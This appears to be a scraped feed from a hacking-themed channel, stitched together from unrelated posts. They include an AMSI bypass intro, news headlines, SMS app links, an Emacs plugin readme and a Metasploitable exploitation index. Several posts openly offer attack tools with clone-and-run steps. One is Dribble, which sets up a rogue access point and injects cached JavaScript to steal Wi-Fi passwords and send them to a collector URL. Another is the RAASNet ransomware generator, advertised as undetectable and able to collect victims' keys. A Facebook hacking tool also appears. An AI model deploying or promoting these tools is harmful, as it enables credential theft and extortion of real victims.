UNDERCODE COMMUNITY
How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code.pdf
495.3 KB
Introduction
v4.8 of the dotnet framework uses Antimalware Scan Interface (AMSI) and Windows Lockdown Policy (WLDP) to block potentially unwanted software running from memory. WLDP will verify the digital signature of dynamic code while AMSI will scan for software that is either harmful or blocked by the administrator. This post documents three publicly known methods red teams currently use to bypass AMSI and one to bypass WLDP. The bypass methods described are somewhat generic and don't require any special knowledge. If you're reading this post anytime after June 2019, the methods may no longer work. The research shown here was conducted in collaboration with TheWover.

🦑WIRELESS HACKING:
Dribble is a project I developed to play with my Raspberry Pi. The purpose of dribble is to steal Wi-Fi passwords by exploiting the web browser's cache. Dribble creates a fake Wi-Fi access point and waits for clients to connect to it. When clients connect, dribble intercepts every HTTP request made for JavaScript pages and injects malicious JavaScript code. The malicious JavaScript code is cached so that it persists when clients disconnect. When clients disconnect and reconnect to their home router, the malicious JavaScript code activates, steals the Wi-Fi password from the router and sends it back to the attacker.

Requirements:

hostapd
dnsmasq
node.js
bettercap

INSTALLATION & RUN:

Download and run
To run dribble, just download the repo and run it as root.

1) git clone https://github.com/rhaidiz/dribble

2) cd dribble

3) sudo ./dribble
Configuration

4) All the configuration you need is located in the config file:

# the internet interface
internet=eth0

# the wifi interface
phy=wlan0

# The ESSID
essid="TEST"

# collector
collector="http://rhaidiz.net/something"

# the routers' IPs
routerips=("192.168.0.1/24" "10.0.0.1/24")

# usernames dictionary
usernames="['admin', 'admin1', 'test']"

# passwords dictionary
passwords="['admin', 'admin1', 'password']"

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
Forwarded from UNDERCODE NEWS
Does the USA want to ban WeChat from the Play Store & App Store?
#International
_
Forwarded from UNDERCODE NEWS
The cryptocurrency protocol contained a dangerous vulnerability

#Vulnerabilities
_
Forwarded from UNDERCODE NEWS
After fined Google 9.7 billion US dollars, the EU exaggerated Google: shopping search is not bad
#International
_

🦑SOME FREE SMS APPLICATIONS :

http://www.chompsms.com/

https://play.google.com/store/apps/details?id=com.jb.gosms

http://www.handcent.com/

https://mightytext.net/

http://www.mysms.com/

https://play.google.com/store/apps/details?id=com.moez.QKSMS

http://www.textra.me/

textnow.com & textplus & nextplus...by watch videos..

verified from 1 month
Forwarded from UNDERCODE NEWS
NEW PRODUCT FROM FACEBOOK !
#Technologies
_
Forwarded from UNDERCODE NEWS
High-Severity Vulnerabilities in WooCommerce
#Vulnerabilities
_

#Web Hacking new

[Hack This Site!](https://www.hackthissite.org/) - a free, safe and legal training ground for hackers to test and expand their hacking skills

[Hack The Box](https://www.hackthebox.eu) - a free site to perform pentesting in a variety of different systems.

[Webhacking.kr](http://webhacking.kr/)

[0xf.at](https://0xf.at/) - a website without logins or ads where you can solve password-riddles (so called hackits).

[Gruyere](https://google-gruyere.appspot.com/)

[Others](https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=On-Line_apps)

https://github.com/Manisso/fsociety

https://github.com/sundowndev/hacker-roadmap

https://github.com/infoslack/awesome-web-hacking

https://github.com/LyleMi/Learn-Web-Hacking

https://github.com/nil0x42/phpsploit


🦑Automate your work : Evil operator for evaluating code, translating text,
taking notes, searching via google, etc.

INSTALLATION & RUN:

1) git clone https://github.com/Dewdrops/evil-extra-operator.git

2) cd evil-extra-operator

3) ;; change default key bindings (if you want) HERE
;; (setq evil-extra-operator-eval-key (kbd "ge"))
(require 'evil-extra-operator)
(global-evil-extra-operator-mode 1)

4) The key binding customization must be placed BEFORE (require 'evil-extra-operator).

5) Or you can just choose what commands you need and bind them yourself:

(require 'evil-extra-operator)
(define-key evil-motion-state-map "gr" 'evil-operator-eval)
(define-key evil-motion-state-map "g'" 'evil-operator-google-translate)

Commands and default bindings

1) gr (evil-operator-eval)

Operator for evaluating code, i.e., use grip to evaluate the current paragraph, grr to evaluate the current line, or if you are in visual state, gr to evaluate the current active region. You can customize the option evil-extra-operator-eval-modes-alist to let evil-operator-eval support more languages. Example:

(setq evil-extra-operator-eval-modes-alist
'((ruby-mode ruby-send-region)
(enh-ruby-mode ruby-send-region)))

2) gG (evil-operator-google-search)

Operator to search the web via google.

3) g. (evil-operator-google-translate)

Operator to translate text via google translate. To use this command, you should have google-translate installed.

4) gh (evil-operator-highlight)

Operator to highlight region. To use this command, you should have highlight.el installed. You can use hlt-eraser-mouse or hlt-eraser which are provided by highlight.el to erase highlighted area.

5) gs (evil-operator-fold)

Operator to fold region. To use this command, you should have fold-this.el installed. You can use fold-this-unfold-at-point or fold-this-unfold-all which are provided by fold-this.el for unfolding.

6) go (evil-operator-org-capture)

Operator form of org-capture. So you can use goip to capture current paragraph.

7) gR (evil-operator-remember)

Like evil-operator-org-capture, but use remember-region instead of org-capture.

8) No default binding (evil-operator-query-replace)


🦑FACEBOOK PENTESTING :

The New version OFFICIAL FBHT V3

INSTALLATION & RUN:

1) download or clone

https://github.com/chinoogawa/fbht/archive/V3.0.zip

https://github.com/chinoogawa/fbht/archive/V3.0.tar.gz

2) fbht$:- python setup.py

/usr/lib/python2.7/distutils/dist.py:267

usage: setup.py [global_opts] cmd1 [cmd1_opts] [cmd2 [cmd2_opts] ...]
or: setup.py --help [cmd1 cmd2 ...]
or: setup.py --help-commands
or: setup.py cmd --help

R E Q U I R E M E N T S :

Selenium

Matplotlib-1.2.1

Networkx-1.8.1

Numpy-1.7.1

Pygraphviz-1.1

Simplejson-3.3.0

Mechanize-0.2.5

Other: gephi-0.8.2-beta (Graphs software)


🦑NUCLEAR RANSOMWARE :) new update/more features
F E A T U R E S :

Generate a ransomware payload
With or without GUI payload

FUD (Fully Undetectable by Anti-Virus)

Works on Windows, MacOS and Linux

Super fast encryption with PyCrypto

Compile to EXE, APP or Unix/Linux executable

Custom icon for your EXE payload

Receive keys of victims

Decrypt files

Demo mode (payload won't encrypt anything)

Fullscreen mode (Warning takes over the screen)

Custom warning message for your victim

Custom image in your payload

Ghost mode (Rename by adding .DEMON extension instead of encrypting the files)

Multiple encryption methods

Select file extensions to target

Decide if payload should self-destruct (Console mode feature only)

Decide which drive to target for encryption (working directory)

Verified server access through port forwarding VPN

INSTALLATION & RUN:

1) git clone https://github.com/leonv024/RAASNet.git

2) pip3 install -r requirements.txt

3) python3 RAASNet.py


On Linux, you might need to install these packages:

4) sudo apt install python3-tk python3-pil python3-pil.imagetk

5) Testing connection with remote server:

6) Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989

7) python3 test_socket.py

8)video https://github.com/leonv024/RAASNet/blob/master/demo/PyCrypto-vs-PyAES_demo_10fps.gif

U S E F O R L E A R N
Guide on Metasploitable 2.pdf
2.4 MB
Exploiting Port 22 SSH
Bruteforce Port 22 SSH (RSA Method)
Exploiting port 23 TELNET (Credential Capture)
Exploiting TELNET (Bruteforce)
Port 25 SMTP User Enumeration
Exploiting Port 80 (PHP)
Exploiting Port 139 & 445 (Samba)
Exploiting Port 8080 (Java)
Exploiting Port 5432 (Postgres)
Exploiting Port 6667 (UnrealIRCD)
Exploiting Port 36255
Remote Login Exploitation
Remote Shell Exploitation
Exploiting Port 8787
Bindshell
Exploiting Port 5900 (VNC)
Access Port 2121 (ProFTPD)
Exploiting Port 8180 (Apache Tomcat)
Privilege Escalation via NFS
Exploiting Port 3306 (MYSQL)
Network Scan
Exploiting Port 21 FTP (Hydra)
Exploiting VSFTPD 2.3.4
